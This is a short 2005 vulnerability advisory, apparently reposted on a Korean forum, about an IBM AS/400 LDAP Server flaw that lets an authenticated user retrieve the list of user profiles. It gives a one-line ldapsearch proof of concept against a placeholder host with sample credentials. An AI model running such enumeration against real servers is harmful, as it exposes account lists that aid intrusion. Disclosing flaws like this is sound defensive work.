Rated as : Low
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-04-05
* Technical Description *
A new vulnerability was identified in IBM AS400, which may be exploited by malicious users to obtain sensitive information. The flaw resides in the LDAP Server, which could be exploited by an authenticated user to retrieve the list of users.
Proof of concept :
#ldapsearch -h as400.vulnerable.com -b "cn=accounts,os400-sys=S0011223.vulnerable.com" -D "os400-profile=SCARMEL,cn=accounts,os400-sys=S0011223.vulnerable.com" -w as400Password -L -s sub "os400-profile=*" > results.txt

ino
05-04-06 11:01
0개
3,025회
IBM AS/400 LDAP Server User Accounts Disclosure Vulnerability
댓글목록
등록된 댓글이 없습니다.